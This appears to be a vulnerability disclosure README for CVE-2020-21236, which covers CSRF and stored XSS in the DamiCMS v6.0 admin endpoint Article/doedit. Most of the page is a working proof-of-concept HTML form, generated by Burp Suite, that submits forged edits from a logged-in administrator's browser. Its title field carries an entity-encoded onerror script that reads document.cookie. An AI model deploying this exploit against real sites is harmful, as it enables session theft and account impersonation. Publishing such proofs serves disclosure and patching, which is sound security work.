Headline

CVE-2020-21236: DamiCMS-v6.0.0-have-csrf-and-xss-Vulnerabilities-/README.md at master · wind-cyber/DamiCMS-v6.0.0-have-csrf-and-xss-Vulnerabilities-

A vulnerability in /damicms-master/admin.php?s=/Article/doedit of DamiCMS v6.0 allows attackers to compromise and impersonate user accounts via obtaining a user’s session cookie.

2 years ago

CVE

Open in Source

#xss #csrf #vulnerability #web #android #git #java

Permalink

Cannot retrieve contributors at this time

Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local storage, which are often used to store session tokens. If an attacker can obtain a user’s session cookie, they can then impersonate that user.

After the administrator login in,open the poc poc：

  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://172.16.100.28/damicms-master/admin.php?s=/Article/doedit" method="POST">
      <input type="hidden" name="title" value="æµ&#139;è&#175;&#149;äº&#167;å&#147;&#129;&lt;img&#32;src&#61;&quot;x&quot;&#32;onerror&#61;alert&#40;document&#46;cookie&#41;&#32;&gt;" />
      <input type="hidden" name="TitleFontColor" value="" />
      <input type="hidden" name="keywords" value="" />
      <input type="hidden" name="description" value="å&#158;&#139;å&#143;&#183;&#58;&#32;ä&#187;&#183;æ&#160;&#188;ï&#188;&#154;é&#157;&#162;è&#174;&#174;&#32;é&#162;&#156;è&#137;&#178;&#58;" />
      <input type="hidden" name="hits" value="69" />
      <input type="hidden" name="typeid" value="24" />
      <input type="hidden" name="imgurl" value="&#47;Public&#47;Uploads&#47;thumb&#47;thumb&#95;1393207060&#46;jpg" />
      <input type="hidden" name="isimg" value="1" />
      <input type="hidden" name="content" value="androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;span&#32;style&#61;&quot;white&#45;space&#58;normal&#59;&quot;&gt;androidå&#188;&#128;å&#143;&#145;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;&lt;&#47;span&gt;" />
      <input type="hidden" name="price" value="4000" />
      <input type="hidden" name="color" value="ç&#129;&#176;è&#137;&#178;" />
      <input type="hidden" name="product&#95;xinghao" value="M002457J" />
      <input type="hidden" name="submit" value="ä&#191;&#174;æ&#148;&#185;" />
      <input type="hidden" name="aid" value="66" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

damicms-master/admin.php?s=/Index/index Successfully inserted